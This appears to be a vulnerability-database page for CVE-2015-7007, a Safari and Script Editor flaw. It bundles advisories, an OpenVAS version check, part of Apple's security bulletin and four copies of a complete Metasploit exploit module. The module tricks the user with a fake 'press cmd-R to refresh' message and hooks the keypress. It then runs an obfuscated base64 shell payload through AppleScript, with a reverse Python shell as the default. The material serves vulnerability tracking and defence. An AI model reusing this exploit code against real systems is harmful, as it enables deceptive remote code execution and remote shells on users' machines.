A vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari.
Resolution
Upgrade to OS X 10.11.1 or apply Security Update 2015-007.
References
<https://support.apple.com/en-us/HT205375>
Limitations
A user must load the exploit page in Safari and type Control-R in order for the exploit to succeed.
Platforms
Mac OS X
{"type": "saint", "published": "2015-11-02T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:6D0303C56098956018FAC37F887992D7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7007"]}, {"type": "saint", "idList": ["SAINT:612676C46CB6AE7358500CFF2EF98126", "SAINT:79F02719BFAE256DF9977E552B9FBF77"]}, {"type": "exploitdb", "idList": ["EDB-ID:38535"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134072"]}, {"type": "zdt", "idList": ["1337DAY-ID-24435"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/SAFARI_USER_ASSISTED_APPLESCRIPT_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806148"]}, {"type": "nessus", "idList": ["MACOSX_10_11_1.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14702", "SECURITYVULNS:DOC:32566"]}], "modified": "2019-05-29T19:19:27", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T19:19:27", "rev": 2}, "vulnersScore": 7.2}, "edition": 2, "viewCount": 3, "cvelist": ["CVE-2015-7007"], "references": [], "lastseen": "2019-05-29T19:19:27", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec", "modified": "2015-11-02T00:00:00", "title": "Safari Script Editor AppleScript execution", "description": "Added: 11/02/2015 \nCVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>) \nBID: [77266](<http://www.securityfocus.com/bid/77266>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nA vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari. \n\n### Resolution\n\nUpgrade to OS X 10.11.1 or apply Security Update 2015-007. \n\n### References\n\n<https://support.apple.com/en-us/HT205375> \n\n\n### Limitations\n\nA user must load the exploit page in Safari and type Control-R in order for the exploit to succeed. \n\n### Platforms\n\nMac OS X \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T06:21:29", "description": "Script Editor in Apple OS X before 10.11.1 allows remote attackers to bypass an intended user-confirmation requirement for AppleScript execution via unspecified vectors.", "edition": 6, "cvss3": {}, "published": "2015-10-23T21:59:00", "title": "CVE-2015-7007", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7007"], "modified": "2016-12-24T02:59:00", "cpe": ["cpe:/o:apple:mac_os_x:10.11.0"], "id": "CVE-2015-7007", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7007", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.11.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "description": "Added: 11/02/2015 \nCVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>) \nBID: [77266](<http://www.securityfocus.com/bid/77266>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nA vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari. \n\n### Resolution\n\nUpgrade to OS X 10.11.1 or apply Security Update 2015-007. \n\n### References\n\n<https://support.apple.com/en-us/HT205375> \n\n\n### Limitations\n\nA user must load the exploit page in Safari and type Control-R in order for the exploit to succeed. \n\n### Platforms\n\nMac OS X \n \n\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SAINT:612676C46CB6AE7358500CFF2EF98126", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec", "type": "saint", "title": "Safari Script Editor AppleScript execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "description": "Added: 11/02/2015 \nCVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>) \nBID: [77266](<http://www.securityfocus.com/bid/77266>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nA vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari. \n\n### Resolution\n\nUpgrade to OS X 10.11.1 or apply Security Update 2015-007. \n\n### References\n\n<https://support.apple.com/en-us/HT205375> \n\n\n### Limitations\n\nA user must load the exploit page in Safari and type Control-R in order for the exploit to succeed. \n\n### Platforms\n\nMac OS X \n \n\n", "edition": 4, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SAINT:79F02719BFAE256DF9977E552B9FBF77", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec", "title": "Safari Script Editor AppleScript execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:17", "description": "", "published": "2015-10-23T00:00:00", "type": "packetstorm", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-23T00:00:00", "id": "PACKETSTORM:134072", "href": "https://packetstormsecurity.com/files/134072/Safari-User-Assisted-Applescript-Exec-Attack.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari User-Assisted Applescript Exec Attack', \n'Description' => %q{ \nIn versions of Mac OS X before 10.11.1, the applescript:// URL \nscheme is provided, which opens the provided script in the Applescript \nEditor. Pressing cmd-R in the Editor executes the code without any \nadditional confirmation from the user. By getting the user to press \ncmd-R in Safari, and by hooking the cmd-key keypress event, a user \ncan be tricked into running arbitrary Applescript code. \n \nGatekeeper should be disabled from Security & Privacy in order to \navoid the unidentified Developer prompt. \n}, \n'License' => MSF_LICENSE, \n'Arch' => ARCH_CMD, \n'Platform' => ['unix', 'osx'], \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n}, \n'Targets' => \n[ \n[ 'Mac OS X', {} ] \n], \n'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' }, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 16 2015', \n'Author' => [ 'joev' ], \n'References' => \n[ \n[ 'CVE', '2015-7007' ], \n[ 'URL', 'https://support.apple.com/en-us/HT205375' ] \n], \n'BrowserRequirements' => { \n:source => 'script', \n:ua_name => HttpClients::SAFARI, \n:os_name => OperatingSystems::Match::MAC_OSX \n} \n)) \n \nregister_options([ \nOptString.new('CONTENT', [false, \"Content to display in browser\", \n\"This page has failed to load. Press cmd-R to refresh.\"]), \nOptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) \n], self.class) \nend \n \ndef on_request_exploit(cli, request, profile) \nprint_status(\"Sending #{self.name}\") \nsend_response_html(cli, exploit_html) \nend \n \ndef exploit_html \n\"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\" \nend \n \ndef exploit_js \njs_obfuscate %Q| \nvar as = Array(150).join(\"\\\\n\") + \n'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"'; \nvar url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as); \nwindow.onkeydown = function(e) { \nif (e.keyCode == 91) { \nwindow.location = url; \n} \n}; \n| \nend \n \ndef sh \n'killall \"Script Editor\"; nohup ' + payload.encoded \nend \n \ndef content \ndatastore['CONTENT'] \nend \n \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134072/safari_user_assisted_applescript_exec.rb.txt"}], "zdt": [{"lastseen": "2018-04-01T21:30:55", "description": "Exploit for macOS platform in category remote exploits", "edition": 2, "published": "2015-10-26T00:00:00", "type": "zdt", "title": "Safari User-Assisted Applescript Exec Attack Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-26T00:00:00", "id": "1337DAY-ID-24435", "href": "https://0day.today/exploit/description/24435", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n \r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\r\n 'Description' => %q{\r\n In versions of Mac OS X before 10.11.1, the applescript:// URL\r\n scheme is provided, which opens the provided script in the Applescript\r\n Editor. Pressing cmd-R in the Editor executes the code without any\r\n additional confirmation from the user. By getting the user to press\r\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\r\n can be tricked into running arbitrary Applescript code.\r\n \r\n Gatekeeper should be disabled from Security & Privacy in order to\r\n avoid the unidentified Developer prompt.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => ['unix', 'osx'],\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Mac OS X', {} ]\r\n ],\r\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2015',\r\n 'Author' => [ 'joev' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-7007' ],\r\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\r\n ],\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::SAFARI,\r\n :os_name => OperatingSystems::Match::MAC_OSX\r\n }\r\n ))\r\n \r\n register_options([\r\n OptString.new('CONTENT', [false, \"Content to display in browser\",\r\n \"This page has failed to load. Press cmd-R to refresh.\"]),\r\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\r\n ], self.class)\r\n end\r\n \r\n def on_request_exploit(cli, request, profile)\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, exploit_html)\r\n end\r\n \r\n def exploit_html\r\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\r\n end\r\n \r\n def exploit_js\r\n js_obfuscate %Q|\r\n var as = Array(150).join(\"\\\\n\") +\r\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\r\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\r\n window.onkeydown = function(e) {\r\n if (e.keyCode == 91) {\r\n window.location = url;\r\n }\r\n };\r\n |\r\n end\r\n \r\n def sh\r\n 'killall \"Script Editor\"; nohup ' + payload.encoded\r\n end\r\n \r\n def content\r\n datastore['CONTENT']\r\n end\r\n \r\n \r\nend\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24435"}], "exploitdb": [{"lastseen": "2016-02-04T08:18:24", "description": "Safari User-Assisted Applescript Exec Attack. CVE-2015-7007. Remote exploit for osx platform", "published": "2015-10-26T00:00:00", "type": "exploitdb", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-26T00:00:00", "id": "EDB-ID:38535", "href": "https://www.exploit-db.com/exploits/38535/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\r\n 'Description' => %q{\r\n In versions of Mac OS X before 10.11.1, the applescript:// URL\r\n scheme is provided, which opens the provided script in the Applescript\r\n Editor. Pressing cmd-R in the Editor executes the code without any\r\n additional confirmation from the user. By getting the user to press\r\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\r\n can be tricked into running arbitrary Applescript code.\r\n\r\n Gatekeeper should be disabled from Security & Privacy in order to\r\n avoid the unidentified Developer prompt.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => ['unix', 'osx'],\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Mac OS X', {} ]\r\n ],\r\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2015',\r\n 'Author' => [ 'joev' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-7007' ],\r\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\r\n ],\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::SAFARI,\r\n :os_name => OperatingSystems::Match::MAC_OSX\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('CONTENT', [false, \"Content to display in browser\",\r\n \"This page has failed to load. Press cmd-R to refresh.\"]),\r\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\r\n ], self.class)\r\n end\r\n\r\n def on_request_exploit(cli, request, profile)\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, exploit_html)\r\n end\r\n\r\n def exploit_html\r\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\r\n end\r\n\r\n def exploit_js\r\n js_obfuscate %Q|\r\n var as = Array(150).join(\"\\\\n\") +\r\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\r\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\r\n window.onkeydown = function(e) {\r\n if (e.keyCode == 91) {\r\n window.location = url;\r\n }\r\n };\r\n |\r\n end\r\n\r\n def sh\r\n 'killall \"Script Editor\"; nohup ' + payload.encoded\r\n end\r\n\r\n def content\r\n datastore['CONTENT']\r\n end\r\n\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38535/"}], "metasploit": [{"lastseen": "2020-10-07T21:48:04", "description": "In versions of Mac OS X before 10.11.1, the applescript:// URL scheme is provided, which opens the provided script in the Applescript Editor. Pressing cmd-R in the Editor executes the code without any additional confirmation from the user. By getting the user to press cmd-R in Safari, and by hooking the cmd-key keypress event, a user can be tricked into running arbitrary Applescript code. Gatekeeper should be disabled from Security & Privacy in order to avoid the unidentified Developer prompt.\n", "published": "2015-10-22T14:46:56", "type": "metasploit", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_USER_ASSISTED_APPLESCRIPT_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\n 'Description' => %q{\n In versions of Mac OS X before 10.11.1, the applescript:// URL\n scheme is provided, which opens the provided script in the Applescript\n Editor. Pressing cmd-R in the Editor executes the code without any\n additional confirmation from the user. By getting the user to press\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\n can be tricked into running arbitrary Applescript code.\n\n Gatekeeper should be disabled from Security & Privacy in order to\n avoid the unidentified Developer prompt.\n },\n 'License' => MSF_LICENSE,\n 'Arch' => ARCH_CMD,\n 'Platform' => ['unix', 'osx'],\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n },\n 'Targets' =>\n [\n [ 'Mac OS X', {} ]\n ],\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2015-10-16',\n 'Author' => [ 'joev' ],\n 'References' =>\n [\n [ 'CVE', '2015-7007' ],\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\n ],\n 'BrowserRequirements' => {\n :source => 'script',\n :ua_name => HttpClients::SAFARI,\n :os_name => OperatingSystems::Match::MAC_OSX\n }\n ))\n\n register_options([\n OptString.new('CONTENT', [false, \"Content to display in browser\",\n \"This page has failed to load. Press cmd-R to refresh.\"]),\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ])\n end\n\n def on_request_exploit(cli, request, profile)\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, exploit_html)\n end\n\n def exploit_html\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\n end\n\n def exploit_js\n js_obfuscate %Q|\n var as = Array(150).join(\"\\\\n\") +\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\n window.onkeydown = function(e) {\n if (e.keyCode == 91) {\n window.location = url;\n }\n };\n |\n end\n\n def sh\n 'killall \"Script Editor\"; nohup ' + payload.encoded\n end\n\n def content\n datastore['CONTENT']\n end\n\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb"}], "openvas": [{"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7007", "CVE-2015-6987", "CVE-2015-7061", "CVE-2015-7059", "CVE-2015-7003", "CVE-2015-6983", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7021", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-6995", "CVE-2015-5945", "CVE-2015-7008", "CVE-2015-7023", "CVE-2015-7015", "CVE-2015-7060", "CVE-2015-6990", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6563", "CVE-2015-6974", "CVE-2015-7988", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017"], "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806148", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 October-15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Shakeel <bshakeel@secpod.com> on 2018-05-15\n# For proper Version Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806148\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2015-5943\", \"CVE-2015-6983\", \"CVE-2015-7061\", \"CVE-2015-7060\",\n \"CVE-2015-7059\", \"CVE-2015-7007\", \"CVE-2015-5945\", \"CVE-2015-6563\",\n \"CVE-2014-3565\", \"CVE-2012-6151\", \"CVE-2015-7988\", \"CVE-2015-6994\",\n \"CVE-2015-6988\", \"CVE-2015-6974\", \"CVE-2015-7021\", \"CVE-2015-7020\",\n \"CVE-2015-7019\", \"CVE-2015-7008\", \"CVE-2015-6990\", \"CVE-2015-6987\",\n \"CVE-2015-6995\", \"CVE-2015-7017\", \"CVE-2015-7015\", \"CVE-2015-7023\",\n \"CVE-2015-7006\", \"CVE-2015-7003\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 12:54:16 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code, overwrite cookies, elevate privileges, execute\n arbitrary code with system privileges, cause unexpected application termination,\n read kernel memory, conduct impersonation attacks, run arbitrary AppleScript,\n overwrite arbitrary files and control keychain access prompts.\");\n\n script_tag(name:\"affected\", value:\"Apple OS X El Capitan versions before\n 10.11.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade Apple OS X El Capitan to version\n 10.11.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205375\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.11\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(osVer && osVer =~ \"^10\\.11\")\n{\n\n if(version_is_less(version:osVer, test_version:\"10.11.1\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.11.1\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", "CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "description": "\r\n\r\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\r\n2015-007\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\r\navailable and address the following:\r\n\r\nAccelerate Framework\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in the Accelerate\r\nFramework in multi-threading mode. This issue was addressed through\r\nimproved accessor element validation and improved object locking.\r\nCVE-ID\r\nCVE-2015-5940 : Apple\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Multiple vulnerabilities in PHP\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.29 and 5.4.45. These were addressed by updating PHP to\r\nversions 5.5.29 and 5.4.45.\r\nCVE-ID\r\nCVE-2015-0235\r\nCVE-2015-0273\r\nCVE-2015-6834\r\nCVE-2015-6835\r\nCVE-2015-6836\r\nCVE-2015-6837\r\nCVE-2015-6838\r\n\r\nATS\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted webpage may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in ATS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nAudio\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode\r\nDescription: An uninitialized memory issue existed in coreaudiod.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-7003 : Mark Brand of Google Project Zero\r\n\r\nAudio\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Playing a malicious audio file may lead to arbitrary code\r\nexecution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of audio files. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5933 : Apple\r\nCVE-2015-5934 : Apple\r\n\r\nBom\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Unpacking a maliciously crafted archive may lead to\r\narbitrary code execution\r\nDescription: A file traversal vulnerability existed in the handling\r\nof CPIO archives. This issue was addressed through improved\r\nvalidation of metadata.\r\nCVE-ID\r\nCVE-2015-7006 : Mark Dowd of Azimuth Security\r\n\r\nCFNetwork\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to cookies\r\nbeing overwritten\r\nDescription: A parsing issue existed when handling cookies with\r\ndifferent letter casing. This issue was addressed through improved\r\nparsing.\r\nCVE-ID\r\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\r\nTsinghua University, Jian Jiang of University of California,\r\nBerkeley, Haixin Duan of Tsinghua University and International\r\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\r\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\r\nScience Institute and University of California, Berkeley, coordinated\r\nvia CERT/CC\r\n\r\nconfigd\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to elevate privileges\r\nDescription: A heap based buffer overflow issue existed in the DNS\r\nclient library. A malicious application with the ability to 